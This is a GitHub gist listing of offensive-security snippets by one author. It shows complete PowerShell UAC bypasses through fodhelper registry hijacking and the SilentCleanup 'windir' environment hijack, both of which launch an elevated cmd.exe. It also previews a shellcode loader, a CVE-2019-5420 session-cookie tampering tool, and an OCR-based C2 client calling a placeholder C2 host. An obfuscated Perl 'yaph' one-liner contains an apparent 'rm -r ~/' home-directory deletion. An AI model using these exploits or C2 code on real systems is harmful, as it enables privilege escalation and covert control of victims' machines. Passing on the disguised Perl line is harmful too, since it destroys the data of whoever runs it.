adenkiewicz
/ mainc.c
Last active
December 2, 2021 15:44
— forked from jackullrich/mainc.c
Single Step Encryption/Decryption
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| LONG SingleStepEncryptDecrypt(EXCEPTION_POINTERS* ExceptionInfo); | |
| typedef VOID(__stdcall* Shellcode)(); | |
| LPBYTE ShellcodeBuffer; | |
| ULONG_PTR PreviousOffset; | |
| ULONG_PTR CurrentOffset; | |
| ULONGLONG InstructionCount; | |
| DWORD dwOld; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import argparse | |
| from datetime import datetime | |
| from scapy.all import sniff, Dot11ProbeReq | |
| import asyncio | |
| def parse_args(): | |
| desc = "802.11 probes tracker by Adrian Denkiewicz" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force | |
| New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force | |
| Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value cmd.exe -Force | |
| Start-Process "C:\Windows\System32\fodhelper.exe" | |
| Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force |
adenkiewicz
/ elevate.ps1
Created
April 21, 2020 10:52
UAC bypass for "Always Notify" on Windows 10.0.18363
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| New-ItemProperty "HKCU:\Environment" -Name "windir" -Value "cmd.exe /k cmd.exe" -PropertyType String -Force | |
| schtasks.exe /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I |
adenkiewicz
/ yaph.pl
Created
April 3, 2020 21:28
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl -l | |
| $??/$`rm -r ~/:s%%FD_XBLN|CEBLWXYB^SDLfSDZL^WU]SDONO%; | |
| s%.%$&^'6'%ge;y*x-z*', *;s**$_*ee; |
adenkiewicz
/ CVE-2019-5420.py
Last active
March 29, 2020 23:14
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # | |
| # This is a simple decrypt-temper-encrypt tool for CVE-2019-5420 affecting ruby | |
| # If you're lucky, session cookie will contain user id or other data to play with | |
| # Look for cookies with two "--" substrings inside | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import base64 | |
| import http.server | |
| from threading import Thread, Condition | |
| from PIL import Image, ImageDraw, ImageFont | |
| import pytesseract | |
| condition = Condition() |
adenkiewicz
/ CQExtractorClient.ps1
Created
September 23, 2019 14:01
C2 client based on CQExtractor module
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Import-Module .\CQExtractor.psm1 -Force | |
| # FIXME: replace with real C2 hostname | |
| $C2 = "http://c2:8080/image.png" | |
| $filename = "image.png" | |
| $filename2 = "image2.png" | |
| class Encoder { | |
| [system.collections.hashtable]$arr |
adenkiewicz
/ CQExtractorTest.ps1
Created
September 23, 2019 13:59
Simple test script for CQExtractor module and OCR quality
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Import-Module .\CQExtractor.psm1 -Force | |
| $score = 0 | |
| $arr = New-Object system.collections.hashtable | |
| $arr["l"] = ".A" | |
| $arr["1"] = ".B" | |
| $arr["L"] = ".C" | |
| $arr["i"] = ".D" | |
| $arr["I"] = ".E" |
adenkiewicz
/ CQExtractor.psm1
Created
September 23, 2019 13:57
Wrapper for Microsoft OCR and image-creation methods.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Modified code from https://github.com/HumanEquivalentUnit/PowerShell-Misc | |
| using namespace System.Drawing | |
| using namespace System.Windows.Forms | |
| using namespace Windows.Storage | |
| using namespace Windows.Graphics.Imaging | |
| Add-Type -AssemblyName System.Drawing | |
| Add-Type -AssemblyName System.Windows.Forms |
NewerOlder